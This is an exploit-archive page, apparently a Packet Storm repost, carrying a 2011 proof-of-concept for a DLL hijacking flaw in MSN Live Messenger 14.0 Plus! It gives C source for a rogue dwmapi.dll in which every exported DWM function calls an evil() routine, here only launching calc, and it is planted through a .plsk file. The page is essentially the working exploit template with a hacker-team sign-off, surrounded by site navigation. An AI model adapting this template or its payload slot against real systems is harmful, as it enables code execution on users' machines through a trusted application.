MSN Live Messenger 14.0 Plus! DLL Hijack

MSN Live Messenger 14.0 Plus! DLL Hijack: Posted May 31, 2011; Authored by Kalashinkov3; MSN Live Messenger version 14.0 Plus! suffers from a DLL hijacking vulnerability.; tags | exploit; systems | windows; SHA-256 | aefdb3d190c9576d9c7aff86808641f8c0b86d00650059273a13b750b4452983; Download | Favorite | View

MSN Live Messenger 14.0 Plus! DLL Hijack

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                  0
1  [+] Support e-mail  : submit[at]1337day.com                        1
0                                                                      0
1               #########################################              1
0               I'm kalashinkov3 member from Inj3ct0r Team              1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#########################################################
# Title : Msn Live Messenger14.0=>Plus! DLL Hijacking Exploit (dwmapi.dll)
# Author: Kalashinkov3
# Home : 13000/ ALGERIA
# Email : kalashinkov3[at]Hotmail[dot]Fr
# Date : 31/05/2011
# Category  : Local Exploit
# Tested on: [Windows Xp Sp3 Fr]       
#########################################################  

# File Vulnerable: 
- msnmsgr.exe


# Vulnerable extensions:

- .plsk

" Vulnerable Dll's:

dwmapi.dll 

./

#include <windows.h>
#define DLLIMPORT _declspec (dllexport)
                                                                                                                                                                                   
DLLIMPORT void DwmDefWindowProc() { evil(); }                                                                                                                                                                               
DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); }                                                                                                                                                                      
DLLIMPORT void DwmEnableComposition() { evil(); }                                                                                                                                                                           
DLLIMPORT void DwmEnableMMCSS() { evil(); }                                                                                                                                                                                 
DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); }                                                                                                                                                                   
DLLIMPORT void DwmGetColorizationColor() { evil(); }                                                                                                                                                                        
DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); }                                                                                                                                                                    
DLLIMPORT void DwmGetWindowAttribute() { evil(); }                                                                                                                                                                          
DLLIMPORT void DwmIsCompositionEnabled() { evil(); }                                                                                                                                                                        
DLLIMPORT void DwmModifyPreviousDxFrameDuration() { evil(); }                                                                                                                                                               
DLLIMPORT void DwmQueryThumbnailSourceSize() { evil(); }                                                                                                                                                                    
DLLIMPORT void DwmRegisterThumbnail() { evil(); }                                                                                                                                                                           
DLLIMPORT void DwmSetDxFrameDuration() { evil(); }                                                                                                                                                                          
DLLIMPORT void DwmSetPresentParameters() { evil(); }                                                                                                                                                                        
DLLIMPORT void DwmSetWindowAttribute() { evil(); }                                                                                                                                                                          
DLLIMPORT void DwmUnregisterThumbnail() { evil(); }                                                                                                                                                                         
DLLIMPORT void DwmUpdateThumbnailProperties() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}


^_^ GOOD LUCK ALL :) 

+ Greets To==================================================================+
                                                                             + 
BrOx-dz, KedAns-Dz, Caddy-Dz, KnocKout, toxic-kim, [Lila Far=>D], Keinji1258 +
ALLA Foundou,586, 1337day.com, packetstormsecurity.org, Exploit-id.com       +
andhrahackers.com, all Algerians Hacker'S ;) & 1337day.com/team              +
                    # All My Friends #                                       +
=============================================================================+

Top Authors In Last 30 Days

Red Hat 288 files
Ubuntu 71 files
Debian 18 files
Ahmet Umit Bayram 10 files
Apple 9 files
malvuln 6 files
Jann Horn 5 files
Google Security Research 5 files
Gentoo 4 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,088)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,054)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,500)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,955)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (16,027)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,561)
UNIX (9,416)
UnixWare (187)
Windows (6,662)
Other

MSN Live Messenger 14.0 Plus! DLL Hijack

MSN Live Messenger 14.0 Plus! DLL Hijack

File Archive:

June 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

MSN Live Messenger 14.0 Plus! DLL Hijack

Share This

MSN Live Messenger 14.0 Plus! DLL Hijack

File Archive:

June 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems